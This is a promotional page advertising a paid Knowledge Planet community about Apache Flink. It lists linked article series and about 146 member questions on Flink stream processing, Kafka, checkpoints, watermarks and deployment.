For more exclusive materials, please join my Knowledge Planet (知识星球)!
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-23-124320.jpg)
Some people ask: what gets published in the Knowledge Planet, and is it worth joining?
The series already published there:
### Big Data Blockbuster series (大数据重磅炸弹)
1、[《大数据重磅炸弹——实时计算引擎 Flink》开篇词](https://t.zsxq.com/fqfuVRR)
2、[你公司到底需不需要引入实时计算引擎?](https://t.zsxq.com/emMBaQN)
3、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2)
4、[别再傻傻的分不清大数据框架Flink、Blink、Spark Streaming、Structured Streaming和Storm之间的区别了](https://t.zsxq.com/eAyRz7Y)
5、[Flink 环境准备看这一篇就够了](https://t.zsxq.com/iaMJAe6)
6、[一文讲解从 Flink 环境安装到源码编译运行](https://t.zsxq.com/iaMJAe6)
7、[通过 WordCount 程序教你快速入门上手 Flink](https://t.zsxq.com/eaIIiAm)
8、[Flink 如何处理 Socket 数据及分析实现过程](https://t.zsxq.com/Vnq72jY)
9、[Flink job 如何在 Standalone、YARN、Mesos、K8S 上部署运行?](https://t.zsxq.com/BiyvFUZ)
10、[Flink 数据转换必须熟悉的算子(Operator)](https://t.zsxq.com/fufUBiA)
11、[Flink 中 Processing Time、Event Time、Ingestion Time 对比及其使用场景分析](https://t.zsxq.com/r7aYB2V)
12、[如何使用 Flink Window 及 Window 基本概念与实现原理](https://t.zsxq.com/byZbyrb)
13、[如何使用 DataStream API 来处理数据?](https://t.zsxq.com/VzNBi2r)
14、[Flink WaterMark 详解及结合 WaterMark 处理延迟数据](https://t.zsxq.com/Iub6IQf)
15、[基于 Apache Flink 的监控告警系统](https://t.zsxq.com/MniUnqb)
16、[数据仓库、数据库的对比介绍与实时数仓案例分享](https://t.zsxq.com/v7QzNZ3)
17、[使用 Prometheus Grafana 监控 Flink](https://t.zsxq.com/uRN3VfA)
### Source code series
1、[Flink 源码解析 —— 源码编译运行](https://t.zsxq.com/UZfaYfE)
2、[Flink 源码解析 —— 项目结构一览](https://t.zsxq.com/zZZjaYf)
3、[Flink 源码解析—— local 模式启动流程](https://t.zsxq.com/zV7MnuJ)
4、[Flink 源码解析 —— standalonesession 模式启动流程](https://t.zsxq.com/QZVRZJA)
5、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Job Manager 启动](https://t.zsxq.com/u3fayvf)
6、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Task Manager 启动](https://t.zsxq.com/MnQRByb)
7、[Flink 源码解析 —— 分析 Batch WordCount 程序的执行过程](https://t.zsxq.com/YJ2Zrfi)
8、[Flink 源码解析 —— 分析 Streaming WordCount 程序的执行过程](https://t.zsxq.com/qnMFEUJ)
9、[Flink 源码解析 —— 如何获取 JobGraph?](https://t.zsxq.com/naaMf6y)
10、[Flink 源码解析 —— 如何获取 StreamGraph?](https://t.zsxq.com/qRFIm6I)
11、[Flink 源码解析 —— Flink JobManager 有什么作用?](https://t.zsxq.com/2VRrbuf)
12、[Flink 源码解析 —— Flink TaskManager 有什么作用?](https://t.zsxq.com/RZbu7yN)
13、[Flink 源码解析 —— JobManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ)
14、[Flink 源码解析 —— TaskManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ)
15、[Flink 源码解析 —— 深度解析 Flink Checkpoint 机制](https://t.zsxq.com/ynQNbeM)
16、[Flink 源码解析 —— 深度解析 Flink 序列化机制](https://t.zsxq.com/JaQfeMf)
17、[Flink 源码解析 —— 深度解析 Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM)
18、[Flink Metrics 源码解析 —— Flink-metrics-core](https://t.zsxq.com/Mnm2nI6)
19、[Flink Metrics 源码解析 —— Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6)
20、[Flink Metrics 源码解析 —— Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6)
21、[Flink Metrics 源码解析 —— Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6)
22、[Flink Metrics 源码解析 —— Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6)
23、[Flink Metrics 源码解析 —— Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6)
24、[Flink Metrics 源码解析 —— Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6)
25、[Flink Metrics 源码解析 —— Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6)
26、[Flink Metrics 源码解析 —— Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6)
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-150037.jpg)
26、[Flink Annotations 源码解析](https://t.zsxq.com/f6eAu3J)
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-145923.jpg)
Besides the source-code series 《从1到100深入学习Flink》, the case-study articles of 《从0到1学习Flink》 are also published first in the Knowledge Planet, so that you can learn Flink through demos before diving into the source code!
If you run into any problems while learning Flink, you can ask there and I will answer with priority. My apologies: work keeps me fairly busy, so I cannot answer every question that comes in over WeChat,
but paying Knowledge Planet members always get answered first. Fortunately the community there is quite active, and many questions have been preserved through this question-and-answer process.
1、[为何我使用 ValueState 保存状态 Job 恢复是状态没恢复?](https://t.zsxq.com/62rZV7q)
2、[flink中watermark究竟是如何生成的,生成的规则是什么,怎么用来处理乱序数据](https://t.zsxq.com/yF2rjmY)
3、[消费kafka数据的时候,如果遇到了脏数据,或者是不符合规则的数据等等怎么处理呢?](https://t.zsxq.com/uzFIeiq)
4、[在Kafka 集群中怎么指定读取/写入数据到指定broker或从指定broker的offset开始消费?](https://t.zsxq.com/Nz7QZBY)
5、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj)
6、[jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7)
7、[使用flink-web-ui提交作业并执行 但是/opt/flink/log目录下没有日志文件 请问关于flink的日志(包括jobmanager、taskmanager、每个job自己的日志默认分别存在哪个目录 )需要怎么配置?](https://t.zsxq.com/Nju7EuV)
8、[通过flink 仪表盘提交的jar 是存储在哪个目录下?](https://t.zsxq.com/6muRz3j)
9、[从Kafka消费数据进行etl清洗,把结果写入hdfs映射成hive表,压缩格式、hive直接能够读取flink写出的文件、按照文件大小或者时间滚动生成文件](https://t.zsxq.com/uvFQvFu)
10、[flink jar包上传至集群上运行,挂掉后,挂掉期间kafka中未被消费的数据,在重新启动程序后,是自动从checkpoint获取挂掉之前的kafka offset位置,自动消费之前的数据进行处理,还是需要某些手动的操作呢?](https://t.zsxq.com/ubIY33f)
11、[flink 启动时不自动创建 上传jar的路径,能指定一个创建好的目录吗](https://t.zsxq.com/UfA2rBy)
12、[Flink sink to es 集群上报 slot 不够,单机跑是好的,为什么?](https://t.zsxq.com/zBMnIA6)
13、[Fllink to elasticsearch如何创建索引文档期时间戳?](https://t.zsxq.com/qrZBAQJ)
14、[blink有没有api文档或者demo,是否建议blink用于生产环境。](https://t.zsxq.com/J2JiIMv)
15、[flink的Python api怎样?bug多吗?](https://t.zsxq.com/ZVVrjuv)
16、[Flink VS Spark Streaming VS Storm VS Kafka Stream ](https://t.zsxq.com/zbybQNf)
17、[你们做实时大屏的技术架构是什么样子的?flume→kafka→flink→redis,然后后端去redis里面捞数据,酱紫可行吗?](https://t.zsxq.com/Zf6meAm)
18、[做一个统计指标的时候,需要在Flink的计算过程中多次读写redis,感觉好怪,星主有没有好的方案?](https://t.zsxq.com/YniI2JQ)
19、[Flink 使用场景大分析,列举了很多的常用场景,可以好好参考一下](https://t.zsxq.com/fYZZfYf)
20、[将kafka中数据sink到mysql时,metadata的数据为空,导入mysql数据不成功???](https://t.zsxq.com/I6eEqR7)
21、[使用了ValueState来保存中间状态,在运行时中间状态保存正常,但是在手动停止后,再重新运行,发现中间状态值没有了,之前出现的键值是从0开始计数的,这是为什么?是需要实现CheckpointedFunction吗?](https://t.zsxq.com/62rZV7q)
22、[flink on yarn jobmanager的HA需要怎么配置。还是说yarn给管理了](https://t.zsxq.com/mQ7YbQJ)
23、[有两个数据流就行connect,其中一个是实时数据流(kafka 读取),另一个是配置流。由于配置流是从关系型数据库中读取,速度较慢,导致实时数据流流入数据的时候,配置信息还未发送,这样会导致有些实时数据读取不到配置信息。目前采取的措施是在connect方法后的flatmap的实现的在open 方法中,提前加载一次配置信息,感觉这种实现方式不友好,请问还有其他的实现方式吗?](https://t.zsxq.com/q3VvB6U)
24、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj)
25、[不采用yarm部署flink,还有其他的方案吗? 主要想解决服务器重启后,flink服务怎么自动拉起? jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7)
26、[在一个 Job 里将同份数据昨晚清洗操作后,sink 到后端多个地方(看业务需求),如何保持一致性?(一个sink出错,另外的也保证不能插入)](https://t.zsxq.com/bYnimQv)
27、[flink sql任务在某个特定阶段会发生tm和jm丢失心跳,是不是由于gc时间过长呢,](https://t.zsxq.com/YvBAyrV)
28、[有这样一个需求,统计用户近两周进入产品详情页的来源(1首页大搜索,2产品频道搜索,3其他),为php后端提供数据支持,该信息在端上报事件中,php直接获取有点困难。 我现在的解决方案 通过flink滚动窗口(半小时),统计用户半小时内3个来源pv,然后按照日期序列化,直接写mysql。php从数据库中解析出来,再去统计近两周占比。 问题1,这个需求适合用flink去做吗? 问题2,我的方案总感觉怪怪的,有没有好的方案?](https://t.zsxq.com/fayf2Vv)
29、[一个task slot 只能同时运行一个任务还是多个任务呢?如果task slot运行的任务比较大,会出现OOM的情况吗?](https://t.zsxq.com/ZFiY3VZ)
30、[你们怎么对线上flink做监控的,如果整个程序失败了怎么自动重启等等](https://t.zsxq.com/Yn2JqB6)
31、[flink cep规则动态解析有接触吗?有没有成型的框架?](https://t.zsxq.com/YFMFeaA)
32、[每一个Window都有一个watermark吗?window是怎么根据watermark进行触发或者销毁的?](https://t.zsxq.com/VZvRrjm)
33、[ CheckPoint与SavePoint的区别是什么?](https://t.zsxq.com/R3ZZJUF)
34、[flink可以在算子中共享状态吗?或者大佬你有什么方法可以共享状态的呢?](https://t.zsxq.com/Aa62Bim)
35、[运行几分钟就报了,看taskmager日志,报的是 failed elasticsearch bulk request null,可是我代码里面已经做过空值判断了呀 而且也过滤掉了,flink版本1.7.2 es版本6.3.1](https://t.zsxq.com/ayFmmMF)
36、[这种情况,我们调并行度 还是配置参数好](https://t.zsxq.com/Yzzzb2b)
37、[大家都用jdbc写,各种数据库增删查改拼sql有没有觉得很累,ps.set代码一大堆,还要计算每个参数的位置](https://t.zsxq.com/AqBUR3f)
38、[关于datasource的配置,每个taskmanager对应一个datasource?还是每个slot? 实际运行下来,每个slot中datasorce线程池只要设置1就行了,多了也用不到?](https://t.zsxq.com/AqBUR3f)
39、[kafka现在每天出现数据丢失,现在小批量数据,一天200W左右, kafka版本为 1.0.0,集群总共7个节点,TOPIC有十六个分区,单条报文1.5k左右](https://t.zsxq.com/AqBUR3f)
40、[根据key.hash的绝对值 对并发度求模,进行分组,假设10各并发度,实际只有8个分区有处理数据,有2个始终不处理,还有一个分区处理的数据是其他的三倍,如截图](https://t.zsxq.com/AqBUR3f)
41、[flink每7小时不知道在处理什么, CPU 负载 每7小时,有一次高峰,5分钟内平均负载超过0.8,如截图](https://t.zsxq.com/AqBUR3f)
42、[有没有Flink写的项目推荐?我想看到用Flink写的整体项目是怎么组织的,不单单是一个单例子](https://t.zsxq.com/M3fIMbu)
43、[Flink 源码的结构图](https://t.zsxq.com/yv7EQFA)
44、[我想根据不同业务表(case when)进行不同的redis sink(hash ,set),我要如何操作?](https://t.zsxq.com/vBAYNJq)
45、[这个需要清理什么数据呀,我把hdfs里面的已经清理了 启动还是报这个](https://t.zsxq.com/b2zbUJa)
46、[ 在流处理系统,在机器发生故障恢复之后,什么情况消息最多会被处理一次?什么情况消息最少会被处理一次呢?](https://t.zsxq.com/QjQFmQr)
47、[我检查点都调到5分钟了,这是什么问题](https://t.zsxq.com/zbQNfuJ)
48、[reduce方法后 那个交易时间 怎么不是最新的,是第一次进入的那个时间,](https://t.zsxq.com/ZrjEauN)
49、[Flink on Yarn 模式,用yarn session脚本启动的时候,我在后台没有看到到Jobmanager,TaskManager,ApplicationMaster这几个进程,想请问一下这是什么原因呢?因为之前看官网的时候,说Jobmanager就是一个jvm进程,Taskmanage也是一个JVM进程](https://t.zsxq.com/VJyr3bM)
50、[Flink on Yarn的时候得指定 多少个TaskManager和每个TaskManager slot去运行任务,这样做感觉不太合理,因为用户也不知道需要多少个TaskManager适合,Flink 有动态启动TaskManager的机制吗。](https://t.zsxq.com/VJyr3bM)
51、[参考这个例子,Flink 零基础实战教程:如何计算实时热门商品 | Jark's Blog, 窗口聚合的时候,用keywindow,用的是timeWindowAll,然后在aggregate的时候用aggregate(new CustomAggregateFunction(), new CustomWindowFunction()),打印结果后,发现窗口中一直使用的重复的数据,统计的结果也不变,去掉CustomWindowFunction()就正常了 ? 非常奇怪](https://t.zsxq.com/UBmUJMv)
52、[用户进入产品预定页面(端埋点上报),并填写了一些信息(端埋点上报),但半小时内并没有产生任何订单,然后给该类用户发送一个push。 1. 这种需求适合用flink去做吗?2. 如果适合,说下大概的思路](https://t.zsxq.com/naQb6aI)
53、[业务场景是实时获取数据存redis,请问我要如何按天、按周、按月分别存入redis里?(比方说过了一天自动换一个位置存redis)](https://t.zsxq.com/AUf2VNz)
54、[有人 AggregatingState 的例子吗, 感觉官方的例子和 官网的不太一样?](https://t.zsxq.com/UJ6Y7m2)
55、[flink-jdbc这个jar有吗?怎么没找到啊?1.8.0的没找到,1.6.2的有](https://t.zsxq.com/r3BaAY3)
56、[现有个关于savepoint的问题,操作流程为,取消任务时设置保存点,更新任务,从保存点启动任务;现在遇到个问题,假设我中间某个算子重写,原先通过state编写,有用定时器,现在更改后,采用窗口,反正就是实现方式完全不一样;从保存点启动就会一直报错,重启,原先的保存点不能还原,此时就会有很多数据重复等各种问题,如何才能保证数据不丢失,不重复等,恢复到停止的时候,现在想到的是记下kafka的偏移量,再做处理,貌似也不是很好弄,有什么解决办法吗](https://t.zsxq.com/jiybIee)
57、[需要在flink计算app页面访问时长,消费Kafka计算后输出到Kafka。第一条log需要等待第二条log的时间戳计算访问时长。我想问的是,flink是分布式的,那么它能否保证执行的顺序性?后来的数据有没有可能先被执行?](https://t.zsxq.com/eMJmiQz)
58、[我公司想做实时大屏,现有技术是将业务所需指标实时用spark拉到redis里存着,然后再用一条spark streaming流计算简单乘除运算,指标包含了各月份的比较。请问我该如何用flink简化上述流程?](https://t.zsxq.com/Y7e6aIu)
59、[flink on yarn 方式,这样理解不知道对不对,yarn-session这个脚本其实就是准备yarn环境的,执行run任务的时候,根据yarn-session初始化的yarnDescription 把 flink 任务的jobGraph提交到yarn上去执行](https://t.zsxq.com/QbIayJ6)
60、[同样的代码逻辑写在单独的main函数中就可以成功的消费kafka ,写在一个spring boot的程序中,接受外部请求,然后执行相同的逻辑就不能消费kafka。你遇到过吗?能给一些查问题的建议,或者在哪里打个断点,能看到为什么消费不到kafka的消息呢?](https://t.zsxq.com/VFMRbYN)
61、[请问下flink可以实现一个流中同时存在订单表和订单商品表的数据 两者是一对多的关系 能实现得到 以订单表为主 一个订单多个商品 这种需求嘛](https://t.zsxq.com/QNvjI6Q)
62、[在用中间状态的时候,如果中间一些信息保存在state中,有没有必要在redis中再保存一份,来做第三方的存储。](https://t.zsxq.com/6ie66EE)
63、[能否出一期flink state的文章。什么场景下用什么样的state?如,最简单的,实时累加update到state。](https://t.zsxq.com/bm6mYjI)
64、[flink的双流join博主有使用的经验吗?会有什么常见的问题吗](https://t.zsxq.com/II6AEe2)
65、[窗口触发的条件问题](https://t.zsxq.com/V7EmUZR)
66、[flink 定时任务怎么做?有相关的demo么?](https://t.zsxq.com/JY3NJam)
67、[流式处理过程中数据的一致性如何保证或者如何检测](https://t.zsxq.com/7YZ3Fuz)
68、[重启flink单机集群,还报job not found 异常。](https://t.zsxq.com/nEEQvzR)
69、[kafka的数据是用 org.apache.kafka.common.serialization.ByteArraySerialize序列化的,flink这边消费的时候怎么通过FlinkKafkaConsumer创建DataStream?](https://t.zsxq.com/qJyvzNj)
70、[现在公司有一个需求,一些用户的支付日志,通过sls收集,要把这些日志处理后,结果写入到MySQL,关键这些日志可能连着来好几条才是一个用户的,因为发起请求,响应等每个环节都有相应的日志,这几条日志综合处理才能得到最终的结果,请问博主有什么好的方法没有?](https://t.zsxq.com/byvnaEi)
71、[flink 支持hadoop 主备么? hadoop主节点挂了 flink 会切换到hadoop 备用节点?](https://t.zsxq.com/qfie6qR)
72、[请教大家: 实际 flink 开发中用 scala 多还是 java多些? 刚入手 flink 大数据 scala 需要深入学习么?](https://t.zsxq.com/ZVZzZv7)
73、[我使用的是flink是1.7.2最近用了split的方式分流,但是底层的SplitStream上却标注为Deprecated,请问是官方不推荐使用分流的方式吗?](https://t.zsxq.com/Qzbi6yn)
74、[KeyBy 的正确理解,和数据倾斜问题的解释](https://t.zsxq.com/Auf2NVR)
75、[用flink时,遇到个问题 checkpoint大概有2G左右, 有背压时,flink会重启有遇到过这个问题吗](https://t.zsxq.com/3vnIm62)
76、[flink使用yarn-session方式部署,如何保证yarn-session的稳定性,如果yarn-session挂了,需要重新部署一个yarn-session,如何恢复之前yarn-session上的job呢,之前的checkpoint还能使用吗?](https://t.zsxq.com/URzVBIm)
77、[我想请教一下关于sink的问题。我现在的需求是从Kafka消费Json数据,这个Json数据字段可能会增加,然后将拿到的json数据以parquet的格式存入hdfs。现在我可以拿到json数据的schema,但是在保存parquet文件的时候不知道怎么处理。一是flink没有专门的format parquet,二是对于可变字段的Json怎么处理成parquet比较合适?](https://t.zsxq.com/MjyN7Uf)
78、[flink如何在较大的数据量中做去重计算。](https://t.zsxq.com/6qBqVvZ)
79、[flink能在没有数据的时候也定时执行算子吗?](https://t.zsxq.com/Eqjyju7)
80、[使用rocksdb状态后端,自定义pojo怎么实现序列化和反序列化的,有相关demo么?](https://t.zsxq.com/i2zVfIi)
81、[check point 老是失败,是不是自定义的pojo问题?到本地可以,到hdfs就不行,网上也有很多类似的问题 都没有一个很好的解释和解决方案](https://t.zsxq.com/vRJujAi)
82、[cep规则如图,当start事件进入时,时间00:00:15,而后进入end事件,时间00:00:40。我发现规则无法命中。请问within 是从start事件开始计时?还是跟window一样根据系统时间划分的?如果是后者,请问怎么配置才能从start开始计时?](https://t.zsxq.com/MVFmuB6)
83、[Flink聚合结果直接写Mysql的幂等性设计问题](https://t.zsxq.com/EybM3vR)
84、[Flink job打开了checkpoint,用的rocksdb,通过观察hdfs上checkpoint目录,为啥算副本总量会暴增爆减](https://t.zsxq.com/62VzNRF)
85、[Flink 提交任务的 jar包可以指定路径为 HDFS 上的吗]()
86、[在flink web Ui上提交的任务,设置的并行度为2,flink是stand alone部署的。两个任务都正常的运行了几天了,今天有个地方逻辑需要修改,于是将任务cancel掉(在命令行cancel也试了),结果taskmanger挂掉了一个节点。后来用其他任务试了,也同样会导致节点挂掉](https://t.zsxq.com/VfimieI)
87、[一个配置动态更新的问题折腾好久(配置用个静态的map变量存着,有个线程定时去数据库捞数据然后存在这个map里面更新一把),本地 idea 调试没问题,集群部署就一直报 空指针异常。下游的算子使用这个静态变量map去get key在集群模式下会出现这个空指针异常,估计就是拿不到 map](https://t.zsxq.com/nee6qRv)
88、[批量写入MySQL,完成HBase批量写入](https://t.zsxq.com/3bEUZfQ)
89、[用flink清洗数据,其中要访问redis,根据redis的结果来决定是否把数据传递到下流,这有可能实现吗?](https://t.zsxq.com/Zb6AM3V)
90、[监控页面流处理的时候这个发送和接收字节为0。](https://t.zsxq.com/RbeYZvb)
91、[sink到MySQL,如果直接用idea的话可以运行,并且成功,大大的代码上面用的FlinkKafkaConsumer010,而我的Flink版本为1.7,kafka版本为2.12,所以当我用FlinkKafkaConsumer010就有问题,于是改为
FlinkKafkaConsumer就可以直接在idea完成sink到MySQL,但是为何当我把该程序打成Jar包,去运行的时候,就是报FlinkKafkaConsumer找不到呢](https://t.zsxq.com/MN7iuZf)
92、[SocketTextStreamWordCount中输入中文统计不出来,请问这个怎么解决,我猜测应该是需要修改一下代码,应该是这个例子默认统计英文](https://t.zsxq.com/e2VNN7Y)
93、[ Flink 应用程序本地 ide 里面运行的时候并行度是怎么算的?](https://t.zsxq.com/RVRn6AE)
94、[ 请问下flink中对于窗口的全量聚合有apply和process两种 他们有啥区别呢](https://t.zsxq.com/rzbIQBi)
95、[不知道大大熟悉Hbase不,我想直接在Hbase中查询某一列数据,因为有重复数据,所以想使用distinct统计实际数据量,请问Hbase中有没有类似于sql的distinct关键字。如果没有,想实现这种可以不?](https://t.zsxq.com/UJIubub)
96、[ 来分析一下现在Flink,Kafka方面的就业形势,以及准备就业该如何准备的这方面内容呢?](https://t.zsxq.com/VFaQn2j)
97、[ 大佬知道flink的dataStream可以转换为dataSet吗?因为数据需要11分钟一个批次计算五六个指标,并且涉及好几步reduce,计算的指标之间有联系,用Stream卡住了。](https://t.zsxq.com/Zn2FEQZ)
98、[1.如何在同一窗口内实现多次的聚合,比如像spark中的这样2.多个实时流的jion可以用window来处理一批次的数据吗?](https://t.zsxq.com/aIqjmQN)
99、[写的批处理的功能,现在本机跑是没问题的,就是在linux集群上出现了问题,就是不知道如果通过本地调用远程jar包然后传参数和拿到结果参数返回本机](https://t.zsxq.com/ZNvb2FM)
100、[我用standalone开启一个flink集群,上传flink官方用例Socket Window WordCount做测试,开启两个parallelism能正常运行,但是开启4个parallelism后出现错误](https://t.zsxq.com/femmiqf)
101、[ 有使用AssignerWithPunctuatedWatermarks 的案例Demo吗?网上找了都是AssignerWithPeriodicWatermarks的,不知道具体怎么使用?](https://t.zsxq.com/YZ3vbY3)
102、[ 有一个datastream(从文件读取的),然后我用flink sql进行计算,这个sql是一个加总的运算,然后通过retractStreamTableSink可以把文件做sql的结果输出到文件吗?这个输出到文件的接口是用什么呢?](https://t.zsxq.com/uzFyVJe)
103、[ 为啥split这个流设置为过期的](https://t.zsxq.com/6QNNrZz)
104、[ 需要使用flink table的水印机制控制时间的乱序问题,这种场景下我就使用水印+窗口了,我现在写的demo遇到了问题,就是在把触发计算的窗口table(WindowedTable)转换成table进行sql操作时发现窗口中的数据还是乱序的,是不是flink table的WindowedTable不支持水印窗口转table-sql的功能](https://t.zsxq.com/Q7YNRBE)
105、[ Flink 对 SQL 的重视性](https://t.zsxq.com/Jmayrbi)
106、[ flink job打开了checkpoint,任务跑了几个小时后就出现下面的错,截图是打出来的日志,有个OOM,又遇到过的没?](https://t.zsxq.com/ZrZfa2Z)
107、[ 本地测试是有数据的,之前该任务放在集群也是有数据的,可能提交过多次,现在读不到数据了 group id 也换过了, 只能重启集群解决么?](https://t.zsxq.com/emaAeyj)
108、[使用flink清洗数据存到es中,直接在flatmap中对处理出来的数据用es自己的ClientInterface类直接将数据存入es当中,不走sink,这样的处理逻辑是不是会有问题。](https://t.zsxq.com/ayBa6am)
108、[ flink从kafka拿数据(即增量数据)与存量数据进行内存聚合的需求,现在有一个方案就是程序启动的时候先用flink table将存量数据加载到内存中创建table中,然后将stream的增量数据与table的数据进行关联聚合后输出结束,不知道这种方案可行么。目前个人认为有两个主要问题:1是增量数据stream转化成append table后不知道能与存量的table关联聚合不,2是聚合后输出的结果数据是否过于频繁造成网络传输压力过大](https://t.zsxq.com/QNvbE62)
109、[ 设置时间时间特性有什么区别呢, 分别在什么场景下使用呢?两种设置时间延迟有什么区别呢 , 分别在什么场景下使用](https://t.zsxq.com/yzjAQ7a)
110、[ flink从rabbitmq中读取数据,设置了rabbitmq的CorrelationDataId和checkpoint为EXACTLY_ONCE;如果flink完成一次checkpoint后,在这次checkpoint之前消费的数据都会从mq中删除。如果某次flink停机更新,那就会出现mq中的一些数据消费但是处于Unacked状态。在flink又重新开启后这批数据又会重新消费。那这样是不是就不能保证EXACTLY_ONCE了](https://t.zsxq.com/qRrJEaa)
111、[1. 在Flink checkpoint 中, 像 operator的状态信息 是在设置了checkpoint 之后自动的进行快照吗 ?2. 上面这个和我们手动存储的 Keyed State 进行快照(这个应该是增量快照)](https://t.zsxq.com/mAqn2RF)
112、[现在有个实时商品数,交易额这种统计需求,打算用 flink从kafka读取binglog日志进行计算,但binglog涉及到insert和update这种操作时 怎么处理才能统计准确,避免那种重复计算的问题?](https://t.zsxq.com/E2BeQ3f)
113、[我这边用flink做实时监控,功能很简单,就是每条消息做keyby然后三分钟窗口,然后做些去重操作,触发阈值则报警,现在问题是同一个时间窗口同一个人的告警会触发两次,集群是三台机器,standalone cluster,初步结果是三个算子里有两个收到了同样的数据](https://t.zsxq.com/vjIeyFI)
114、[在使用WaterMark的时候,默认是每200ms去设置一次watermark,那么每个taskmanager之间,由于得到的数据不同,所以往往产生的最大的watermark不同。 那么这个时候,是各个taskmanager广播这个watermark,得到全局的最大的watermark,还是说各个taskmanager都各自用自己的watermark。主要没看到广播watermark的源码。不知道是自己观察不仔细还是就是没有广播这个变量。](https://t.zsxq.com/unq3FIa)
115、[现在遇到一个需求,需要在job内部定时去读取redis的信息,想请教flink能实现像普通程序那样的定时任务吗?](https://t.zsxq.com/AeUnAyN)
116、[有个触发事件开始聚合,等到数量足够,或者超时则sink推mq 环境 flink 1.6 用了mapState 记录触发事件 1 数据足够这个OK 2 超时state ttl 1.6支持,但是问题来了,如何在超时时候增加自定义处理?](https://t.zsxq.com/z7uZbY3)
117、[请问impala这种mpp架构的sql引擎,为什么稳定性比较差呢?](https://t.zsxq.com/R7UjeUF)
118、[watermark跟并行度相关不是,过于全局了,期望是keyby之后再针对每个keyed stream 打watermark,这个有什么好的实践呢?](https://t.zsxq.com/q7myfAQ)
119、[请问如果把一个文件的内容读取成datastream和dataset,有什么区别吗??他们都是一条数据一条数据的被读取吗?](https://t.zsxq.com/rB6yfeA)
120、[有没有kylin相关的资料,或者调优的经验?](https://t.zsxq.com/j2j6EyJ)
121、[flink先从jdbc读取配置表到流中,另外从kafka中新增或者修改这个配置,这个场景怎么把两个流一份配置流?我用的connect,接着发不成广播变量,再和实体流合并,但在合并时报Exception in thread ""main"" java.lang.IllegalArgumentException](https://t.zsxq.com/iMjmQVV)
122、[Flink exactly-once,kafka版本为0.11.0 ,sink基于FlinkKafkaProducer 每五分钟一次checkpoint,但是checkpoint开始后系统直接卡死,at-lease-once 一分钟能完成的checkpoint, 现在十分钟无法完成没进度还是0, 不知道哪里卡住了](https://t.zsxq.com/RFQNFIa)
123、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2)
124、[Flink异步IO中,下图这两种有什么区别?为啥要加 CompletableFuture.supplyAsync,不太明白?](https://t.zsxq.com/NJq3rj2)
125、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2)
126、[有个计算场景,从kafka消费两个数据源,两个数据结构都有时间段概念,计算需要做的是匹配两个时间段,匹配到了,就生成一条新的记录。请问使用哪个工具更合适,flink table还是cep?请大神指点一下 我这边之前的做法,将两个数据流转为table.两个table over window后join成新的表。结果job跑一会就oom.](https://t.zsxq.com/rniUrjm)
127、[一个互联网公司,或者一个业务系统,如果想做一个全面的监控要怎么做?有什么成熟的方案可以参考交流吗?有什么有什么度量指标吗?](https://t.zsxq.com/vRZ7qJ2)
128、[怎么深入学习flink,或者其他大数据组件,能为未来秋招找一份大数据相关(计算方向)的工作增加自己的竞争力?](https://t.zsxq.com/3vfyJau)
129、[oppo的实时数仓,其中明细层和汇总层都在kafka中,他们的关系库的实时数据也抽取到kafka的ods,那么在构建数仓的,需要join 三四个大业务表,业务表会变化,那么是大的业务表是从kafka的ods读取吗?实时数仓,多个大表join可以吗](https://t.zsxq.com/VBIunun)
130、[Tuple类型有什么方法转换成json字符串吗?现在的场景是,结果在存储到sink中时希望存的是json字符串,这样应用程序获取数据比较好转换一点。如果Tuple不好转换json字符串,那么应该以什么数据格式存储到sink中](https://t.zsxq.com/vnaURzj)
140、[端到端的数据保证,是否意味着中间处理程序中断,也不会造成该批次处理失败的消息丢失,处理程序重新启动之后,会再次处理上次未处理的消息](https://t.zsxq.com/J6eAmYb)
141、[关于flink datastream window相关的。比如我现在使用滚动窗口,统计一周内去重用户指标,按照正常watermark触发计算,需要等到当前周的window到达window的endtime时,才会触发,这样指标一周后才能产出结果。我能不能实现一小时触发一次计算,每次统计截止到当前时间,window中所有到达元素的去重数量。](https://t.zsxq.com/7qBMrBe)
142、[FLIP-16 Loop Fault Tolerance 是讲现在的checkpoint机制无法在stream loop的时候容错吗?现在这个问题解决了没有呀?](https://t.zsxq.com/uJqzBIe)
143、[现在的需求是,统计各个key的今日累计值,一分钟输出一次。如,各个用户今日累计点击次数。这种需求用datastream还是table API方便点?](https://t.zsxq.com/uZnmQzv)
144、[本地idea可以跑的工程,放在standalone集群上,总报错,报错截图如下,大佬请问这是啥原因](https://t.zsxq.com/BqnYRN7)
145、[比如现在用k8s起了一个flink集群,这时候数据源kafka或者hdfs会在同一个集群上吗,还是会单独再起一个hdfs/kafka集群](https://t.zsxq.com/7MJujMb)
146、[flink kafka sink 的FlinkFixedPartitioner 分配策略,在并行度小于topic的partitions时,一个并行实例固定的写消息到固定的一个partition,那么就有一些partition没数据写进去?](https://t.zsxq.com/6U7QFMj)
